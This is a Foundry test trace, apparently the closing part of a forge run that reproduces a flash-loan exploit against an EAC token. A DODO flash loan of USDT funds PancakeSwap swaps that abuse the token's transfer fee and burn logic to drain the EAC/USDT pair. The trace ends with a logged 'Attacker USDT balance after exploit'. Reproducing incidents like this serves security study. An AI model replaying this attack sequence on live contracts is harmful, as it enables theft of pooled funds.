    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 10712766987498485265439685 [1.071e25], 524864787513024175843995201 [5.248e26], 1693303711 [1.693e9]
    │   │   │   │   │   │   │   │   │   ├─ [952] EAC::balanceOf(0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 10712768041855724267922478 [1.071e25]
    │   │   │   │   │   │   │   │   │   ├─ [26745] 0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA::swap(0, 51528372379612185155 [5.152e19], 0x000000000000000000000000000000000000dEaD, 0x)
    │   │   │   │   │   │   │   │   │   │   ├─ [10835] 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08::transfer(0x000000000000000000000000000000000000dEaD, 51528372379612185155 [5.152e19])
    │   │   │   │   │   │   │   │   │   │   │   ├─ [867] 0xFF69f0CcDFaDD7E0353CDe9bE0b844D5b2008Cd7::tradeMapping(0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   │   │   │   │   ├─ [867] 0xFF69f0CcDFaDD7E0353CDe9bE0b844D5b2008Cd7::tradeMapping(0x000000000000000000000000000000000000dEaD) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   │   │   │   │   ├─ [2127] 0xFF69f0CcDFaDD7E0353CDe9bE0b844D5b2008Cd7::sell()
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [930] 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08::balanceOf(0xFF69f0CcDFaDD7E0353CDe9bE0b844D5b2008Cd7) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA, to: 0x000000000000000000000000000000000000dEaD, value: 51528372379612185155 [5.152e19])
    │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   @ 0xff709fe6d6b07f9ae356fd0623922201cbee590f0244353f9a6c0236c15c0ad3: 0x000000000000000000000000000000000000000001b2287124e63d4592ca6e41 → 0x000000000000000000000000000000000000000001b2286e59ccaf99fdf4ebfe
    │   │   │   │   │   │   │   │   │   │   │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x000000000000000000000000000000000000000000001ca096981bcdb34796eb → 0x000000000000000000000000000000000000000000001ca361b1a979481d192e
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   ├─ [952] EAC::balanceOf(0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 10712768041855724267922478 [1.071e25]
    │   │   │   │   │   │   │   │   │   │   ├─ [930] 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08::balanceOf(0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 524864735984651796231810046 [5.248e26]
    │   │   │   │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 10712768041855724267922478 [1.071e25], reserve1: 524864735984651796231810046 [5.248e26])
    │   │   │   │   │   │   │   │   │   │   ├─ emit Swap(sender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 1054357239002482793 [1.054e18], amount1In: 0, amount0Out: 0, amount1Out: 51528372379612185155 [5.152e19], to: 0x000000000000000000000000000000000000dEaD)
    │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   @ 8: 0x64edc39f000001b2287124e63d4592ca6e4100000008dc84431649ce42b39bc5 → 0x64edc39f000001b2286e59ccaf99fdf4ebfe00000008dc8451b81e20dbce642e
    │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   ├─ [930] 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08::balanceOf(0x000000000000000000000000000000000000dEaD) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 135240120398395645696302 [1.352e23]
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x8015483b0e6065217f47f421ae65f14d9869466a3ca4af39af29f6ff478e296a: 0 → 0x0000000000000000000000000000000000000000000000000ec55b4508dbc869
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c, to: 0x279B8306bB7CD010eEDF1227536464A31d6afeA1, value: 34090884061080276987 [3.409e19])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x79d9c90da8c3a4dab4a824f72019ecd1df9e7c26c3d02061e35b5356e9517fc4: 0x000000000000000000000000000000000000000000000000002386f26fc10000 → 0x0000000000000000000000000000000000000000000000000ec55b4508dbc869
    │   │   │   │   │   │   │   │   @ 0xe64bbdbf81749543fc48160eeea97d9b4d5f1c3dba12365c6a22bc3fbc359f7b: 0x00000000000000000000000000000000000000000004231cebf4ec357865e74a → 0x00000000000000000000000000000000000000000004231ec51012a4241d3745
    │   │   │   │   │   │   │   │   @ 0xaadcf068a771e60c74516571db1fbf6e6c3d092d6857fd1c133eb61585622a17: 0x00000000000000000000000000000000000000000000003cac1c8ac9719af238 → 0x00000000000000000000000000000000000000000000003ac45f90082cc8d9d4
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [531] USDT::balanceOf(0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 454283378763169749699028 [4.542e23]
    │   │   │   │   │   │   ├─ [952] EAC::balanceOf(0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 1084061343194160880084 [1.084e21]
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 454283378763169749699028 [4.542e23], reserve1: 1084061343194160880084 [1.084e21])
    │   │   │   │   │   │   ├─ emit Swap(sender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 14300000000000000000000 [1.43e22], amount1In: 0, amount0Out: 0, amount1Out: 35145241300082759780 [3.514e19], to: 0x279B8306bB7CD010eEDF1227536464A31d6afeA1)
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 8: 0x64edc39f00000000003cac1c8ac9719af238000000005d2b8bf82d41204a89d4 → 0x64edc39f00000000003ac45f90082cc8d9d4000000006032c055c89b763a89d4
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [952] EAC::balanceOf(0x279B8306bB7CD010eEDF1227536464A31d6afeA1) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 5001553707551286856857413 [5.001e24]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x8b0b34a73ff4e31e3033a52c5cd13db15f7cfeabd8ac571585f0565d45744ea6: 0 → 0x000000000000000000000000000000000000000000000307345d9b5a55f00000
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [952] EAC::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 2320810729140307098256 [2.32e21]
    │   │   ├─ [25302] EAC::approve(PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [131022] PANCAKE_ROUTER_V2::swapExactTokensForTokensSupportingFeeOnTransferTokens(2320810729140307098256 [2.32e21], 0, [0x64f291DE10eCd36D5f7b64aaEbC70943CFACE28E, 0x55d398326f99059fF775485246999027B3197955], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1693304711 [1.693e9])
    │   │   │   ├─ [102141] EAC::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c, 2320810729140307098256 [2.32e21])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971, value: 46416014582806141965 [4.641e19])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 23208007291403070982 [2.32e19])
    │   │   │   │   ├─ [75568] 0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971::aeb5957d()
    │   │   │   │   │   ├─ [952] EAC::balanceOf(0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 46426014582806141965 [4.642e19]
    │   │   │   │   │   ├─ [23202] EAC::approve(PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 46426014582806141965 [4.642e19])
    │   │   │   │   │   │   ├─ emit Approval(owner: 0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971, spender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 46426014582806141965 [4.642e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x8015483b0e6065217f47f421ae65f14d9869466a3ca4af39af29f6ff478e296a: 0 → 0x000000000000000000000000000000000000000000000002844a56499943dc0d
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [46596] PANCAKE_ROUTER_V2::swapExactTokensForTokensSupportingFeeOnTransferTokens(46426014582806141965 [4.642e19], 0, [0x64f291DE10eCd36D5f7b64aaEbC70943CFACE28E, 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08], 0x000000000000000000000000000000000000dEaD, 1693303711 [1.693e9])
    │   │   │   │   │   │   ├─ [9004] EAC::transferFrom(0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971, 0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA, 46426014582806141965 [4.642e19])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971, spender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 0)
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971, to: 0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA, value: 46416014582806141965 [4.641e19])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x79d9c90da8c3a4dab4a824f72019ecd1df9e7c26c3d02061e35b5356e9517fc4: 0x000000000000000000000000000000000000000000000002844a56499943dc0d → 0x000000000000000000000000000000000000000000000000002386f26fc10000
    │   │   │   │   │   │   │   │   @ 0xff709fe6d6b07f9ae356fd0623922201cbee590f0244353f9a6c0236c15c0ad3: 0x00000000000000000000000000000000000000000008dc8451b81e20dbce642e → 0x00000000000000000000000000000000000000000008dc86d5deed780551403b
    │   │   │   │   │   │   │   │   @ 0x8015483b0e6065217f47f421ae65f14d9869466a3ca4af39af29f6ff478e296a: 0x000000000000000000000000000000000000000000000002844a56499943dc0d → 0
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [930] 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08::balanceOf(0x000000000000000000000000000000000000dEaD) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 135240120398395645696302 [1.352e23]
    │   │   │   │   │   │   ├─ [893] 0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA::getReserves() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 10712768041855724267922478 [1.071e25], 524864735984651796231810046 [5.248e26], 1693303711 [1.693e9]
    │   │   │   │   │   │   ├─ [952] EAC::balanceOf(0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 10712814457870307074064443 [1.071e25]
    │   │   │   │   │   │   ├─ [26745] 0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA::swap(0, 2268425750783038368199 [2.268e21], 0x000000000000000000000000000000000000dEaD, 0x)
    │   │   │   │   │   │   │   ├─ [10835] 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08::transfer(0x000000000000000000000000000000000000dEaD, 2268425750783038368199 [2.268e21])
    │   │   │   │   │   │   │   │   ├─ [867] 0xFF69f0CcDFaDD7E0353CDe9bE0b844D5b2008Cd7::tradeMapping(0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   │   ├─ [867] 0xFF69f0CcDFaDD7E0353CDe9bE0b844D5b2008Cd7::tradeMapping(0x000000000000000000000000000000000000dEaD) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   │   ├─ [2127] 0xFF69f0CcDFaDD7E0353CDe9bE0b844D5b2008Cd7::sell()
    │   │   │   │   │   │   │   │   │   ├─ [930] 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08::balanceOf(0xFF69f0CcDFaDD7E0353CDe9bE0b844D5b2008Cd7) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA, to: 0x000000000000000000000000000000000000dEaD, value: 2268425750783038368199 [2.268e21])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xff709fe6d6b07f9ae356fd0623922201cbee590f0244353f9a6c0236c15c0ad3: 0x000000000000000000000000000000000000000001b2286e59ccaf99fdf4ebfe → 0x000000000000000000000000000000000000000001b227f361117de62a2c4237
    │   │   │   │   │   │   │   │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x000000000000000000000000000000000000000000001ca361b1a979481d192e → 0x000000000000000000000000000000000000000000001d1e5a6cdb2d1be5c2f5
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [952] EAC::balanceOf(0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 10712814457870307074064443 [1.071e25]
    │   │   │   │   │   │   │   ├─ [930] 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08::balanceOf(0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 524862467558901013193441847 [5.248e26]
    │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 10712814457870307074064443 [1.071e25], reserve1: 524862467558901013193441847 [5.248e26])
    │   │   │   │   │   │   │   ├─ emit Swap(sender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 46416014582806141965 [4.641e19], amount1In: 0, amount0Out: 0, amount1Out: 2268425750783038368199 [2.268e21], to: 0x000000000000000000000000000000000000dEaD)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 8: 0x64edc39f000001b2286e59ccaf99fdf4ebfe00000008dc8451b81e20dbce642e → 0x64edc39f000001b227f361117de62a2c423700000008dc86d5deed780551403b
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [930] 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08::balanceOf(0x000000000000000000000000000000000000dEaD) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 137508546149178684064501 [1.375e23]
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x8015483b0e6065217f47f421ae65f14d9869466a3ca4af39af29f6ff478e296a: 0 → 0x000000000000000000000000000000000000000000000002844a56499943dc0d
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c, value: 2251176707266097885309 [2.251e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x79d9c90da8c3a4dab4a824f72019ecd1df9e7c26c3d02061e35b5356e9517fc4: 0x000000000000000000000000000000000000000000000000002386f26fc10000 → 0x000000000000000000000000000000000000000000000002844a56499943dc0d
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000007dcfb805f88b4ffa90 → 0x000000000000000000000000000000000000000000000000002386f26fc10000
    │   │   │   │   │   @ 0xaadcf068a771e60c74516571db1fbf6e6c3d092d6857fd1c133eb61585622a17: 0x00000000000000000000000000000000000000000000003ac45f90082cc8d9d4 → 0x0000000000000000000000000000000000000000000000b4cdb9d80b8a138a51
    │   │   │   │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000003148ac5e84eff99139 → 0x0000000000000000000000000000000000000000000000328abfc63084baff3f
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [531] USDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [893] 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 454283378763169749699028 [4.542e23], 1084061343194160880084 [1.084e21], 1693303711 [1.693e9]
    │   │   │   ├─ [952] EAC::balanceOf(0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c) [staticcall]
    │   │   │   │   └─ ← [Return] 3335238050460258765393 [3.335e21]
    │   │   │   ├─ [18782] 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c::swap(306376857069483687314748 [3.063e23], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [3271] USDT::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 306376857069483687314748 [3.063e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 306376857069483687314748 [3.063e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000040e0b902fa898122853c
    │   │   │   │   │   │   @ 0x617a5d0143043648e66ecb374849afb258c90bd49ef3e62bc8c27ad2320ea1f0: 0x000000000000000000000000000000000000000000006032c055c89b763a89d4 → 0x000000000000000000000000000000000000000000001f520752ce11f5180498
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] USDT::balanceOf(0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c) [staticcall]
    │   │   │   │   │   └─ ← [Return] 147906521693686062384280 [1.479e23]
    │   │   │   │   ├─ [952] EAC::balanceOf(0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c) [staticcall]
    │   │   │   │   │   └─ ← [Return] 3335238050460258765393 [3.335e21]
    │   │   │   │   ├─ emit Sync(reserve0: 147906521693686062384280 [1.479e23], reserve1: 3335238050460258765393 [3.335e21])
    │   │   │   │   ├─ emit Swap(sender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 0, amount1In: 2251176707266097885309 [2.251e21], amount0Out: 306376857069483687314748 [3.063e23], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x64edc39f00000000003ac45f90082cc8d9d4000000006032c055c89b763a89d4 → 0x64edc39f0000000000b4cdb9d80b8a138a51000000001f520752ce11f5180498
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [531] USDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 306376857069483687314748 [3.063e23]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3271] USDT::transfer(DODOPool: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618], 300000000000000008388608 [3e23])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DODOPool: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618], value: 300000000000000008388608 [3e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xf293ac4f2016c12f970d35cabe52ede86e940214b15208a1107f43cb9557cf4a: 0x000000000000000000000000000000000000000000006704f588af9a5a8060a7 → 0x00000000000000000000000000000000000000000000a68bfde0537b3e8060a7
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000040e0b902fa898122853c → 0x000000000000000000000000000000000000000000000159b0ab56a89d22853c
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] USDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 6376857069483678926140 [6.376e21]
    │   │   ├─ emit log_named_decimal_uint(key: "Attacker USDT balance after exploit", val: 6376857069483678926140 [6.376e21], decimals: 18)
    │   │   └─ ← [Stop]
    │   ├─ [2531] 0x7130d2A12B9BCbFAe4f2634d864A1Ee1Ce3Ead9c::balanceOf(DODOPool: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618]) [staticcall]
    │   │   └─ ← [Return] 7273686763177386758 [7.273e18]
    │   ├─ [531] USDT::balanceOf(DODOPool: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618]) [staticcall]
    │   │   └─ ← [Return] 786495227296081906786471 [7.864e23]
    │   ├─ [531] 0x7130d2A12B9BCbFAe4f2634d864A1Ee1Ce3Ead9c::balanceOf(DODOPool: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618]) [staticcall]
    │   │   └─ ← [Return] 7273686763177386758 [7.273e18]
    │   ├─ [531] USDT::balanceOf(DODOPool: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618]) [staticcall]
    │   │   └─ ← [Return] 786495227296081906786471 [7.864e23]
    │   ├─ emit DODOFlashLoan(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 300000000000000008388608 [3e23])
    │   └─ ← [Stop]
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 18.85s (17.32s CPU time)

Ran 2 test suites in 19.77s (19.53s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
